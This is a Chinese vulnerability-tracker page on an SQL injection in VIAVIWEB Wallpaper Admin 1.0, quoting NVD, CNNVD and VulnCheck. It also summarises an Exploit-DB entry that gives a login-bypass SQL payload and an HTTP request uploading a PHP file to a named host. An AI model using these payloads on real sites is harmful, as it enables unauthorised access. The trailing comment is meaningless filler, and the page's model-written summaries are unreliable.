一、 漏洞 CVE-2022-50894 基础信息
漏洞信息
# VIAVIWEB 1.0 SQL注入漏洞
N/A
神龙判断
是否为 Web 类漏洞: 未知
判断理由:
N/A
提示
尽管我们采用了先进的大模型技术,但其输出仍可能包含不准确或过时的信息。
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
神龙会尽力确保数据准确,但也请结合实际情况进行甄别与判断。
神龙祝您一切顺利!
漏洞标题
VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php
来源:美国国家漏洞数据库 NVD
漏洞描述信息
VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. Attackers can send GET requests to edit_gallery_image.php with malicious img_id values to extract database information.
来源:美国国家漏洞数据库 NVD
CVSS信息
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
来源:美国国家漏洞数据库 NVD
漏洞类别
SQL命令中使用的特殊元素转义处理不恰当(SQL注入)
来源:美国国家漏洞数据库 NVD
漏洞标题
VIAVIWEB Wallpaper Admin SQL注入漏洞
来源:中国国家信息安全漏洞库 CNNVD
漏洞描述信息
VIAVIWEB Wallpaper Admin是印度VIAVIWEB公司的一个移动应用后台管理系统。 VIAVIWEB Wallpaper Admin 1.0版本存在SQL注入漏洞,该漏洞源于img_id参数存在SQL注入漏洞,可能导致提取数据库信息。
来源:中国国家信息安全漏洞库 CNNVD
CVSS信息
N/A
来源:中国国家信息安全漏洞库 CNNVD
漏洞类别
SQL注入
来源:中国国家信息安全漏洞库 CNNVD
二、漏洞 CVE-2022-50894 的公开POC
| # | POC 描述 | 源链接 | 神龙链接 |
|---|
三、漏洞 CVE-2022-50894 的情报信息
- https://www.viaviweb.comproduct
标题: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - PHP webapps Exploit -- 🔗来源链接
标签:exploit
神龙速读:## 关键漏洞信息 - **EDB-ID:** 51033 - **CVE:** N/A - **Author:** EDD13MORA - **Type:** WEBAPPS - **Platform:** PHP - **Date:** 2023-03-22 - **Vulnerable App:** VIAVIWEB Wallpaper Admin 1.0 ## 漏洞详情 - **Exploit Title:** VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - **Google Dork:** intext:"Wallpaper Admin" "LOGIN" "password" "Username" - **Date:** 18/09/2022 - **Exploit Author:** Edd13Mora - **Vendor Homepage:** www.viaviweb.com - **Version:** N/A - **Tested on:** Windows 11 - Kali Linux ### 漏洞描述 - **SQL Injection on the Login Page** - `payload --> admin' or 1=1-- -` ### Proof of Concept (POC) ```http POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2 Host: http://googlezik.freehostia.com Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jd8oraed4o52 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=--------------------------33893919268150571572221367848 Content-Length: 467 Origin: http://googlezik.freehostia.com Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Te: trailers --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="category_id" 1 --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="image[]"; filename="poc.php" Content-Type: image/png <?php phpinfo(); ?> --------------------------33893919268150571572221367848 Content-Disposition: form-data; name="submit" --------------------------33893919268150571572221367848-- ``` ### 上传文件位置 - `http://localhost/PAth-Where-Script-Installed/categories/`
标题: VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php | Advisories | VulnCheck -- 🔗来源链接
标签:third-party-advisory
神龙速读:**VIAVIWEB Wallpaper Admin 1.0 SQL Injection via edit_gallery_image.php** - ** Severity:** HIGH - **Date:** January 13, 2026 - **Affecting:** - VIAVIWEB Wallpaper Admin 1.0 **References:** - ExploitDB-51033 - Vendor Homepage **Description:** VIAVIWEB Wallpaper Admin 1.0 contains an SQL injection vulnerability that allows authenticated attackers to manipulate database queries by injecting SQL code through the img_id parameter. Attackers can send GET requests to edit_gallery_image.php with malicious img_id values to extract database information.
- https://nvd.nist.gov/vuln/detail/CVE-2022-50894
四、漏洞 CVE-2022-50894 的评论
匿名用户
2026-01-15 06:08:43Zaproxy alias impedit expedita quisquam pariatur exercitationem. Nemo rerum eveniet dolores rem quia dignissimos.